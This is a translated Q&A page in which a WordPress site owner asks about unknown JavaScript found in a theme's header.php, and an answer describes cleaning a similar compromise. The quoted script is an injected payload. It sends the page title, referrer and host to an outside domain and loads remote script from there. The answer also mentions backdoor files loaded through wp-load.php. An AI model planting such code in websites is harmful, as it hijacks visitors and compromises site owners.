[英]Unknown code found in wordpress site's header.php file
我在主题的header.php文件中找到了以下代码,但我不确定它们的全部含义。
<script>
var a = '';
setTimeout(10);
var default_keyword = encodeURIComponent(document.title);
var se_referrer = encodeURIComponent(document.referrer);
var host = encodeURIComponent(window.location.host);
var base = "http://tradenetservice.com/js/jquery.min.php";
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);
if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '') {
document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');
}
</script>
就在一周前,我有一个被黑的wordpress网站,并进行了类似的注入。 在我的header.php中添加了代码,仅当从移动设备浏览该网站时,该用户才将用户重定向到外部网站(广告,色情)。
活动主题中的其他文件也被注入。
我要做的是下载所有站点文件,并将它们与备份进行比较。 这样,我在主题中找到了注入的代码,还发现了/ wp-includes /中的一些文件,这些文件不是常规wordpress安装的一部分,而是后门。
还要检查站点根目录上的wp-load.php,以我为例,我从/ wp-includes /中删除的文件正在该文件的多余一行中包含/执行。
除了清理您网站的代码外,您还应该进行一些搜索来保护Wordpress网站免受黑客攻击,并会找到许多建议的措施来尝试防止它再次发生。
将 Adsense 代码添加到 header.php 后,WordPress css 未加载
[英]WordPress css not loading after adding Adsense code into header.php
需要找出恶意Javascript如何注入到我的header.php Wordpress主题文件中
[英]Need to find out how malicious Javascript was injected into my header.php Wordpress theme file
将Google Analytics(分析)脚本粘贴到我的网站(head.php,header.php或page-header.php)中吗?
[英]Pasting Google Analytics Script Into My Site (head.php, header.php, or page-header.php)?
在Wordpress中运行的Javascript需要在header.php或functions.php中运行吗?
[英]Javascript not working in Wordpress need to run in header.php or functions.php?
wordpress 自定义主题 - getelementbyid 以访问 header.php 中的元素返回 Z37A6259CC0C461DAE299Z0D76
[英]wordpress custom theme - getelementbyid to access element in header.php returning null
对于响应式设计,如何为移动用户包括一个不同的header.php文件?
[英]For responsive design, how can I include a different header.php file for mobile users?
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.